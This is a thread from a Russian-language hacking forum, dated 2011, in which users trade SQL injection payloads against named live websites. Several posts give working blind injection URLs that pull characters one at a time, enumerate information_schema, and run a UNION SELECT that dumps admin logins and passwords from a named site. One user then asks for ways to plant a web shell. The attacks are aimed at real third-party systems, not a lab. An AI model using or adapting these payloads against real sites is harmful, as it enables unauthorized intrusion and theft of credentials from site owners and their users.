HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18271  
Старый 07.10.2011, 15:34
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от Mr.aids  
Mr.aids said:
запрос вида
log.php?ver=1.0.1.130'
Ошибка при занесении информации в базу.
118 ******/log.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25
INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }
все параметры строковые, можно как то вставить union+select?
/showpost.php?p=2582303&postcount=16413

Выше на несколько постов Expl0ited'ом на живом примере приведен аналогичный способ проведения инъекции с выводом в ошибку Duplicate Entry, разве что только там режется пробел.
 
Ответить с цитированием

  #18272  
Старый 07.10.2011, 22:35
Mr.aids
Guest
Сообщений: n/a
Провел на форуме:
2371

Репутация: 0
По умолчанию

http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7&ip=test8&ver =test9&msg=test10

и эта не работает

http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7',(SELECT%201 ),'a1','a2')--%20-&ip=test8&ver=test9&msg=test10

слепая скуль, что то делаю не так (перебираю a-z)

http://fvsn.org/download.php?id=18296%20and%20lower('a')=lower(sub string((SELECT%20os%20FROM%20log),1,1))

подскажите чего нибудь
 
Ответить с цитированием

  #18273  
Старый 07.10.2011, 23:22
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от Mr.aids  
Mr.aids said:
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7&ip=test8&ver =test9&msg=test10
и эта не работает
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7',(SELECT%201 ),'a1','a2')--%20-&ip=test8&ver=test9&msg=test10
слепая скуль, что то делаю не так (перебираю a-z)
http://fvsn.org/download.php?id=18296%20and%20lower('a')=lower(sub string((SELECT%20os%20FROM%20log),1,1))
подскажите чего нибудь
1 - просто вывод того, что передали параметром.

2.

http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr(vers ion(),1,1))>0,1,0))

меняешь >0 и подбираешь код символа. через char() можешь получить его значение.
 
Ответить с цитированием

  #18274  
Старый 08.10.2011, 13:30
Mr.aids
Guest
Сообщений: n/a
Провел на форуме:
2371

Репутация: 0
По умолчанию

Цитата:
Сообщение от Melfis  
Melfis said:
1 - просто вывод того, что передали параметром.
2.
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr(vers ion(),1,1))>0,1,0))
меняешь >0 и подбираешь код символа. через char() можешь получить его значение.
кстати ascii не работает

http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(lower(subst r('1',1,1)))=31,1,0))
 
Ответить с цитированием

  #18275  
Старый 08.10.2011, 13:34
Mr.aids
Guest
Сообщений: n/a
Провел на форуме:
2371

Репутация: 0
По умолчанию

http://fvsn.org/download.php?id=(18296)and+1=(if(lower(substr(vers ion(),1,1))='5',1,0))

вот так фурычит
 
Ответить с цитированием

  #18276  
Старый 08.10.2011, 13:58
Mr.aids
Guest
Сообщений: n/a
Провел на форуме:
2371

Репутация: 0
По умолчанию

только вот не понятно как с SELECT запрос сделать, там тоже чтото фильтруется
 
Ответить с цитированием

  #18277  
Старый 08.10.2011, 14:12
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от Mr.aids  
Mr.aids said:
только вот не понятно как с SELECT запрос сделать, там тоже чтото фильтруется
что не так?

Код:
Code:
http://fvsn.org/download.php?id=(18296)and(1)=if(mid((select(version())),1,1)=5,1,0)
 
Ответить с цитированием

  #18278  
Старый 08.10.2011, 14:18
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Код:
Code:
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr((select count(table_name) from information_schema.tables),1,1))=49,1,0))
Тут тоже не фильтруется.
 
Ответить с цитированием

  #18279  
Старый 08.10.2011, 15:45
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

такая ситуация:

обычная скуль..ничего не фильтруется, трудностей не возникло вообще до получения login;pass админа. Хочу получить шелл, НО:

1. Не могу найти панель администратора. Такое впечатление, что на самом сайте ее вообще нет.

2. Нет прав у текущего юзверя под которым работает БД на то чтобы залить шелл средствами с ку эль.

Есть какие еще варианты получения шелла?

Чтобы не быть голословным привожу линк

http://banksbattle.ru/333.php?archiv=-59+union+select+1,concat(login,0x20,password),3,4, 5,6+from+admins--

жду ваших предложений=)
 
Ответить с цитированием

  #18280  
Старый 08.10.2011, 18:26
Mr.aids
Guest
Сообщений: n/a
Провел на форуме:
2371

Репутация: 0
По умолчанию

Цитата:
Сообщение от Melfis  
Melfis said:
Код:
Code:
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr((select count(table_name) from information_schema.tables),1,1))=49,1,0))
Тут тоже не фильтруется.
блин у меня сейчас голова взарвётся. как так это работает.

ведь это не работает

http://fvsn.org/download.php?id=(18296)and%20ascii('1')=31

, а в ней ascii

я сейчас сума сойду, как в первом выражении ascii прошло, а в моём не проходит, объясните пожалуйста?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ